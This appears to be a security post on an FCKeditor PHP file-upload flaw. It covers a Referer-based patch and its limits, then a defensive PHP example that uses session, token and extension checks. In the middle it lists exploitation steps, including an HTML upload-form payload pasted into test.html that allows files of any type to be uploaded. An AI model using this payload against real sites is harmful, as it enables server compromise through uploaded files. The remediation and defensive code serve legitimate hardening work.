Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix given online is:
Remediation: remove the FCK editor and use a different editor,
or open the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
// Block submissions that come from outside the site
function outsidepost()
{
    $servername = $_SERVER['SERVER_NAME'];
    // Referer header as sent by the client (null if absent)
    $sub_from = @$_SERVER['HTTP_REFERER'];
    $sub_len = strlen($servername);
    // Skip the 7 characters of "http://" and take the host part
    $checkfrom = substr($sub_from, 7, $sub_len);
    if ($checkfrom != $servername) {
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This blocks submissions from outside the site, but it does not block submissions made from within the site.
Exploitation:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter:
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then use Get Folders and Files and an upload form appears, through which files of any type can be uploaded.
PS: If the editors directory and the upload folder are set to return 403, 500 or 404, the exploit no longer works.
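
The limitation described above, where a form rendered on the site's own test.html satisfies the Referer test, shown next to a gate that decides on the session and the file name instead. This is an added example, not FCKeditor code and not part of the original post; the function names, session keys, allowlist and host name are assumptions, and all sample values are constructed.

```php
<?php
// Added example, not FCKeditor code. Function names, session keys and the
// allowlist are assumptions; all sample values are constructed.

// The Referer test from the fix above, as a pure function
// (offset 7 assumes an "http://" Referer, as in the original).
function referer_check_passes(string $serverName, string $referer): bool
{
    return substr($referer, 7, strlen($serverName)) === $serverName;
}

// Gate that decides on the session and the file itself, not on Referer.
function upload_allowed(array $session, string $postedToken,
                        string $fileName, array $allowedExt): bool
{
    // 1. Only an authenticated editor may upload.
    if (empty($session['editor_id'])) {
        return false;
    }
    // 2. Per-session token, compared in constant time.
    if (empty($session['upload_token'])
        || !hash_equals($session['upload_token'], $postedToken)) {
        return false;
    }
    // 3. One safe base name plus exactly one extension from the allowlist.
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $fileName, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), $allowedExt, true);
}

$server   = 'www.example.test';
$sameSite = 'http://www.example.test/editors/fckeditor/editor/filemanager/'
          . 'browser/default/connectors/test.html';
$allowed  = ['jpg', 'png', 'gif'];

// Referer of a form rendered on the site's own test.html page.
var_dump(referer_check_passes($server, $sameSite));
// The same request at the gate: no session and no token.
var_dump(upload_allowed([], '', 'page.php', $allowed));
// Authenticated editor, matching token, allowlisted type.
$session = ['editor_id' => 7, 'upload_token' => bin2hex(random_bytes(16))];
var_dump(upload_allowed($session, $session['upload_token'], 'photo.JPG', $allowed));
// Same editor, type outside the allowlist.
var_dump(upload_allowed($session, $session['upload_token'], 'page.php', $allowed));
```

Run it with the PHP command-line interpreter; in a real handler the session array would be $_SESSION and the token would be issued when the editor page is served.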